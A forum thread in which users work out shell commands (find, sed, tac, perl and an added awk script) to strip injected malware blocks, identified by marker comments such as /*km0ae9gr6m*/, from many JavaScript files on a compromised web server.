How to remove the last 3 lines from many files?

Hello,

I need to run a command or shell script that will remove the last 3 lines from every .js file that is under the directory /var/ww/vhost/

Can you please help?

Thank you.

On Linux you could use something like this:

for f in /var/ww/vhost/*js; do 
  tac "$f" | 
    tail -n +4 |
      tac > "$f"_tmp_ && 
        mv -- "$f"_tmp_ "$f" 
done

Backup your data first!

 
#take backup first
cp -rf /var/ww/vhost/ /tmp/mybackup
 
for i in /var/ww/vhost/*js
do 
        printf '$-2,$d\nw\nq\n' | ed -s "$i"
done

Assuming that 9th field gives the name of file from ls command.

cd /var/ww/vhost
ls -ltr *.js| grep -v '^d' | awk '{print$9}' > fileList
while read -r line
do
        # count the lines, then keep all but the last three in a new file
        nbrOfLines=`wc -l "$line" | awk '{print $1}'`
        minusThree=`expr $nbrOfLines - 3`
        head -n "$minusThree" "$line" > "new$line"
done < fileList 

radoulov, thank you for the reply.
The js files are in random folders, for example vhost/folder1/test.js
or vhost/folder213/my.js,
etc.

#! /bin/bash

# read one path per line so file names containing spaces are not split
find vhost/ -type f -name "*.js" | while IFS= read -r x
do
    total=$(wc -l < "$x")
    from=$((total - 2))
    sed -i "$from,$total d" "$x"
done

itkamaraj, copying is not possible; the dirs contain other files, 100GB+ in total.

find /vhost -type f -name '*.js' -exec bash -c '
  f=$1
  tac "$f" | 
    tail -n +4 |
      tac > "$f"_tmp_ && 
        mv -- "$f"_tmp_ "$f" 
  ' - {} \;

balajesuri, the js files are in random folders, for example vhost/folder1/test.js
or vhost/folder213/my.js,
etc.,
so
/var/ww/vhost/*.js won't work.

In bash:

Take a backup first, as itkamaraj said.

find /var/ww/vhost -name "*.js" | while IFS= read -r i ; do lines=$(wc -l < "$i") ; sed -i "$((lines - 2)),${lines}d" "$i" ; done

@MaRiOsGR: I've edited my post. Please check again. (Before I could post a solution, a lot of members had posted and you had already asked for recursive searching of js files. I read your requirement after posting my solution.)

This one worked just perfect.
Is there any way to remove the lines only if the js file includes the text "km0ae9gr6m"?

Yes:

find /vhost -type f -name '*.js' -exec bash -c '
  f=$1
  grep -q km0ae9gr6m "$f" &&
    tac "$f" | 
      tail -n +4 |
        tac > "$f"_tmp_ && 
          mv -- "$f"_tmp_ "$f" 
  ' - {} \;

This worked great.
And thank you.

But I've found a "bug" (I'm at fault):
I've found that in 5% of the .js files the code I want to remove/erase
was not added in the last 3 lines but on the same line as the rest of the normal JavaScript code.
The exact hack code starts with

/*km0ae9gr6m*/

Is it possible to remove everything after this code in all files that contain it?

Try this:

find /vhost -type f -name '*.js' -print0 |   
  xargs -0 perl -i -0777pe'
    s|(.*)/\*km0ae9gr6m\*/.*|$1\n|s
   '  

You ought to provide a sample of what the data looks like, instead of expecting everyone to work blindly. Since you cannot solve the problem yourself, you are probably not competent to judge what is and is not important (that is not meant as an insult, just a statement of fact that applies to us all when we can't solve a problem). Giving us as much information as possible helps us provide a better solution in less time.

As a general rule, don't ask people to work from textual descriptions of data. Always provide realistic data (for input and output) and take some time before creating a thread to consider all the special 5% cases that may present themselves. We are volunteering our time to you; don't make us work harder than necessary.

Regards,
Alister

---------- Post updated at 07:36 AM ---------- Previous update was at 07:21 AM ----------

I don't think that will give the correct result if /*km0ae9gr6m*/ occurs more than once in the text to be discarded. It may very well not be an issue, but since we haven't actually seen the data, I mention it just in case.

Regards,
Alister

that did the trick.

Thank you!

---------- Post updated at 02:52 PM ---------- Previous update was at 02:44 PM ----------

Hello,
My intention was not to make your life more difficult and I'm sorry if I've done that. It is not easy to calculate every possible side effect; I'm trying my best.

The full info is this, I've found 305 js scripts that have the above hacking code

and I need to remove them. Restoring 305 files from backup manually is very hard, so the best way (in my humble opinion) was to remove the hacking code,
and if anything fails then restore from the backups as the last resort.

thank you.

No need for an apology. Since I did not submit a suggestion, my life wasn't made more difficult. :wink: Further, I realize that sometimes, despite doing our best, unforeseen complications arise. Sadly, some people don't even make an effort (not saying you are one of those).

Regards,
Alister

Hi all, newbie here :slight_smile:

I also have an issue with this code injection across all js files on 70 domains.
The alien code always starts with km0ae9gr6m and ends in qhk6sa6g1c, with lots of virus code in between.
Is there not a way to SSH in and scan all files in the vhosts directory and say...
find km0ae9gr6m and delete this up to and including qhk6sa6g1c?

This way I'll be able to remove all alien code through SSH?

Is that possible and please excuse my limited knowledge on SSH and commands.

Please please help me out here.

Thanks

Be careful Googling. Some sites I found were infected, though Google was not warning on every one of them.

After Googling /*km0ae9gr6m*/ it has become clear that this is a widespread problem. Some mention that the malicious code start string can also be /*gootkitstart*/ .

Similarly the end string can be /*qhk6sa6g1c*/ or /*gootkitend*/ .

Many other boards mention Ubuntu 8.04 LTS with Plesk. Many mention just Plesk. There is a suggestion that the hackers are using valid ftp accounts and passwords. Others suggest that Plesk is being hacked directly even when supposedly restricted to certain IP addresses. Some suggest using IP Tables to control access.

Ps. Was my sed idea in the other thread any good?

@alister
There is sample data on the other thread.
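
For the request above to delete everything from the start marker up to and including the end marker, here is an added example (not code from any poster in this thread). It handles both marker pairs mentioned, blocks that span several lines or share a line with legitimate code, and it leaves a file alone when a start marker has no matching end marker. The names strip_block and clean_tree and the quarantine directory are assumptions made for this example.

```shell
#!/bin/sh
# Added example. Marker names are the ones quoted in this thread.

# strip_block FILE: print FILE with every start-marker..end-marker span removed.
# Exit status 3 means a start marker was never closed (output must not be used).
strip_block() {
  awk '
    {
      line = $0; out = ""; touched = inblk
      while (1) {
        if (!inblk) {
          if (!match(line, /\/\*(km0ae9gr6m|gootkitstart)\*\//)) { out = out line; break }
          out = out substr(line, 1, RSTART - 1)
          line = substr(line, RSTART + RLENGTH); inblk = 1; touched = 1
        } else {
          if (!match(line, /\/\*(qhk6sa6g1c|gootkitend)\*\//)) break
          line = substr(line, RSTART + RLENGTH); inblk = 0
        }
      }
      # Drop lines that consisted only of injected code; keep everything else.
      if (!touched || out != "") print out
    }
    END { if (inblk) exit 3 }
  ' "$1"
}

# clean_tree ROOT [QUARANTINE]: report affected .js files under ROOT. With a
# QUARANTINE directory (hypothetical, outside the web root) the original is
# copied there first and the file is then rewritten in place.
clean_tree() {
  root=$1 quarantine=$2
  tmp=$(mktemp) || return 1
  find "$root" -type f -name '*.js' | while IFS= read -r f; do
    grep -Eq '/\*(km0ae9gr6m|gootkitstart)\*/' "$f" || continue
    if ! strip_block "$f" > "$tmp"; then
      echo "MANUAL $f"          # unterminated block: leave the file untouched
    elif [ -z "$quarantine" ]; then
      echo "WOULD-CLEAN $f"     # dry run: nothing is modified
    else
      mkdir -p "$quarantine/$(dirname "$f")" &&
        cp -p "$f" "$quarantine/$f" &&
        cat "$tmp" > "$f" && echo "CLEANED $f"
    fi
  done
  rm -f "$tmp"
}
```

Calling clean_tree with only the web root lists what would change; adding a quarantine directory as second argument applies the change. Files reported as MANUAL need inspection by hand.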